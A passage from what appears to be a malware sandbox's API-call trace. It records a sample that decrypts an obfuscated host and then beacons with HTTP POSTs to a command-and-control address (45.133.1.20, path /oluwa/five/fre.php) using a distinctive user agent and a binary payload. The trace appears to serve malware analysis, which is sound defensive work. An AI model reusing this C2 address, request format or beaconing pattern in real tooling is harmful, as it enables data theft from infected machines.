%X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0157.951] GetProcessHeap () returned 0x6a0000 [0157.951] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b6ea0 [0157.951] GetProcessHeap () returned 0x6a0000 [0157.951] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c2708 | out: hHeap=0x6a0000) returned 1 [0157.951] send (s=0x280, buf=0x6b6ea0*, len=242, flags=0) returned 242 [0157.952] send (s=0x280, buf=0x6bb998*, len=159, flags=0) returned 159 [0157.952] GetProcessHeap () returned 0x6a0000 [0157.952] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6b9908 [0157.952] recv (in: s=0x280, buf=0x6b9908, len=4048, flags=0 | out: buf=0x6b9908*) returned 204 [0158.028] GetProcessHeap () returned 0x6a0000 [0158.029] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6ea0 | out: hHeap=0x6a0000) returned 1 [0158.029] GetProcessHeap () returned 0x6a0000 [0158.029] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0158.030] GetProcessHeap () returned 0x6a0000 [0158.031] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0158.032] GetProcessHeap () returned 0x6a0000 [0158.032] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf058 | out: hHeap=0x6a0000) returned 1 [0158.032] closesocket (s=0x280) returned 0 [0158.033] GetProcessHeap () returned 0x6a0000 [0158.033] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baaf0 | out: hHeap=0x6a0000) returned 1 [0158.033] GetProcessHeap () returned 0x6a0000 [0158.033] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0158.033] GetProcessHeap () returned 0x6a0000 [0158.034] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0158.034] GetProcessHeap () returned 0x6a0000 [0158.034] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0158.034] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b9908, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x360) returned 0x280 [0158.037] Sleep (dwMilliseconds=0xea60) [0158.038] GetProcessHeap () returned 0x6a0000 [0158.038] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0158.039] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0158.040] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0158.050] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0158.050] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0158.130] GetProcessHeap () returned 0x6a0000 [0158.130] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0158.130] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0158.132] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad060) returned 1 [0158.132] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0158.133] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0158.133] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0158.198] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0158.198] GetProcessHeap () returned 0x6a0000 [0158.198] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0158.199] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0158.200] CryptDecrypt (in: hKey=0x6ad060, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0158.201] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0158.201] CryptDestroyKey (hKey=0x6ad060) returned 1 [0158.202] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0158.202] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0158.202] GetProcessHeap () returned 0x6a0000 [0158.202] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0158.203] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0158.204] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0158.204] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0158.205] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0158.206] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0158.206] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0158.207] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0158.208] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0158.208] GetProcessHeap () returned 0x6a0000 [0158.208] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0158.208] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0158.209] GetProcessHeap () returned 0x6a0000 [0158.209] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0158.209] GetProcessHeap () returned 0x6a0000 [0158.210] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0158.210] GetProcessHeap () returned 0x6a0000 [0158.210] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0158.210] GetProcessHeap () returned 0x6a0000 [0158.210] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0158.212] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0158.212] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0158.225] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0158.225] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0158.237] GetProcessHeap () returned 0x6a0000 [0158.237] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0158.238] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0158.238] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0158.239] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0158.240] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0158.241] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0158.241] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0158.241] GetProcessHeap () returned 0x6a0000 [0158.242] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0158.243] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0158.243] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0158.244] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0158.244] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0158.245] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0158.245] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0158.245] GetProcessHeap () returned 0x6a0000 [0158.245] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0158.246] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0158.246] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0158.247] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0158.247] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0158.248] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0158.248] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0158.304] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0158.305] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0158.305] GetProcessHeap () returned 0x6a0000 [0158.305] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0158.305] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b6b58*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be928*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0158.305] GetProcessHeap () returned 0x6a0000 [0158.305] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa80 [0158.305] socket (af=2, type=1, protocol=6) returned 0x28c [0158.307] connect (s=0x28c, name=0x6be928*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0158.337] FreeAddrInfoW (pAddrInfo=0x6b6b58*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be928*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0158.337] GetProcessHeap () returned 0x6a0000 [0158.337] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beca0 [0158.337] GetProcessHeap () returned 0x6a0000 [0158.337] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c2708 [0158.338] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0158.339] wvsprintfA (in: param_1=0x6c2708, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0158.339] GetProcessHeap () returned 0x6a0000 [0158.339] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0158.339] GetProcessHeap () returned 0x6a0000 [0158.339] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c2708 | out: hHeap=0x6a0000) returned 1 [0158.339] GetProcessHeap () returned 0x6a0000 [0158.339] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0158.339] GetProcessHeap () returned 0x6a0000 [0158.339] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c2708 [0158.340] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0158.341] wvsprintfA (in: param_1=0x6c2708, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0158.341] GetProcessHeap () returned 0x6a0000 [0158.341] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0158.341] GetProcessHeap () returned 0x6a0000 [0158.342] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c2708 | out: hHeap=0x6a0000) returned 1 [0158.342] send (s=0x28c, buf=0x6bbd20*, len=242, flags=0) returned 242 [0158.343] send (s=0x28c, buf=0x6bb998*, len=159, flags=0) returned 159 [0158.343] GetProcessHeap () returned 0x6a0000 [0158.343] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6b9908 [0158.343] recv (in: s=0x28c, buf=0x6b9908, len=4048, flags=0 | out: buf=0x6b9908*) returned 204 [0158.481] GetProcessHeap () returned 0x6a0000 [0158.481] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0158.489] GetProcessHeap () returned 0x6a0000 [0158.489] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0158.489] GetProcessHeap () returned 0x6a0000 [0158.490] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0158.490] GetProcessHeap () returned 0x6a0000 [0158.490] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beca0 | out: hHeap=0x6a0000) returned 1 [0158.490] closesocket (s=0x28c) returned 0 [0158.492] GetProcessHeap () returned 0x6a0000 [0158.492] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa80 | out: hHeap=0x6a0000) returned 1 [0158.492] GetProcessHeap () returned 0x6a0000 [0158.492] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0158.492] GetProcessHeap () returned 0x6a0000 [0158.493] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0158.493] GetProcessHeap () returned 0x6a0000 [0158.493] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0158.494] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b9908, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x31c) returned 0x28c [0158.511] Sleep (dwMilliseconds=0xea60) [0158.514] GetProcessHeap () returned 0x6a0000 [0158.514] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0158.517] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0158.517] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0158.530] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0158.530] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0158.539] GetProcessHeap () returned 0x6a0000 [0158.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0158.540] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0158.540] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0158.541] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0158.542] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0158.543] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0158.543] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0158.543] GetProcessHeap () returned 0x6a0000 [0158.543] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0158.545] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0158.545] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0158.546] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0158.546] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0158.547] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0158.547] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0158.547] GetProcessHeap () returned 0x6a0000 [0158.547] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0158.548] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0158.549] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0158.549] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0158.550] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0158.551] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0158.551] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0158.552] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0158.552] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0158.552] GetProcessHeap () returned 0x6a0000 [0158.552] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0158.553] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0158.553] GetProcessHeap () returned 0x6a0000 [0158.553] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0158.553] GetProcessHeap () returned 0x6a0000 [0158.554] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0158.554] GetProcessHeap () returned 0x6a0000 [0158.554] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0158.554] GetProcessHeap () returned 0x6a0000 [0158.554] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0158.555] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0158.556] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0158.584] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0158.585] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0158.594] GetProcessHeap () returned 0x6a0000 [0158.594] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0158.595] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0158.596] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad060) returned 1 [0158.596] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0158.597] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0158.598] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0158.598] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0158.598] GetProcessHeap () returned 0x6a0000 [0158.599] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0158.600] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0158.600] CryptDecrypt (in: hKey=0x6ad060, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0158.601] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0158.601] CryptDestroyKey (hKey=0x6ad060) returned 1 [0158.602] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0158.603] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0158.603] GetProcessHeap () returned 0x6a0000 [0158.603] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0158.603] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0158.604] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0158.605] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0158.605] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0158.606] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0158.606] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0158.607] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0158.607] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0158.607] GetProcessHeap () returned 0x6a0000 [0158.607] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0158.607] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b6c48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be838*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0158.608] GetProcessHeap () returned 0x6a0000 [0158.608] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba990 [0158.608] socket (af=2, type=1, protocol=6) returned 0x290 [0158.608] connect (s=0x290, name=0x6be838*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0158.634] FreeAddrInfoW (pAddrInfo=0x6b6c48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be838*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0158.634] GetProcessHeap () returned 0x6a0000 [0158.634] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beb90 [0158.634] GetProcessHeap () returned 0x6a0000 [0158.634] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c2708 [0158.635] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0158.636] wvsprintfA (in: param_1=0x6c2708, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0158.636] GetProcessHeap () returned 0x6a0000 [0158.636] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0158.636] GetProcessHeap () returned 0x6a0000 [0158.636] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c2708 | out: hHeap=0x6a0000) returned 1 [0158.636] GetProcessHeap () returned 0x6a0000 [0158.637] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0158.637] GetProcessHeap () returned 0x6a0000 [0158.637] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c2708 [0158.638] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0158.639] wvsprintfA (in: param_1=0x6c2708, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0158.639] GetProcessHeap () returned 0x6a0000 [0158.639] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0158.639] GetProcessHeap () returned 0x6a0000 [0158.639] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c2708 | out: hHeap=0x6a0000) returned 1 [0158.639] send (s=0x290, buf=0x6bbd20*, len=242, flags=0) returned 242 [0158.640] send (s=0x290, buf=0x6bb998*, len=159, flags=0) returned 159 [0158.640] GetProcessHeap () returned 0x6a0000 [0158.640] RtlAllocateHeap 